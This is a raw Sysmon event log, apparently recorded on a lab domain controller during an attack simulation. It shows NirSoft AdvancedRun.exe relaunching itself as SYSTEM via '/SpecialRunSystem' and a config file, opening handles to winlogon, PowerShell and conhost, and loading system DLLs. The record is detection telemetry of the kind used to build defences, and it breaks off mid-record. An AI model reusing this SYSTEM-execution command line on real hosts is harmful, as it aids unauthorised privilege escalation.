734700x80000000000000004080547Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.508{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080546Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.508{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080545Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.506{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080544Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.504{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080543Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.502{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
10341000x80000000000000004080542Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.500{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM
734700x80000000000000004080541Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.498{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080540Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.498{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080539Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.497{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080538Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.496{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080537Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.495{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080536Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.490{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080535Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.490{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080534Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.489{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080533Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.489{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080532Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.488{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080531Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.488{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080530Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.488{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidNT AUTHORITY\SYSTEM
10341000x80000000000000004080529Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.476{834264DD-DAE4-61EA-0500-000000002702}420436C:\Windows\system32\csrss.exe{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM
10341000x80000000000000004080528Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.475{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\seclogon.dll+17dc|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM
154100x80000000000000004080527Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.476{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /SpecialRunSystem 41a9d8 4792C:\Windows\system32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg -runATTACKRANGE\Administrator
10341000x80000000000000004080526Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.474{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator
10341000x80000000000000004080525Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.474{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator
10341000x80000000000000004080524Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.473{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080523Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.473{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14D0-61EB-A108-000000002702}368C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080522Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.473{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14D0-61EB-A008-000000002702}5124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080521Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.473{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14C8-61EB-9808-000000002702}5860C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080520Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.471{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14C8-61EB-9708-000000002702}2972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080519Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5B08-000000002702}5868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTAC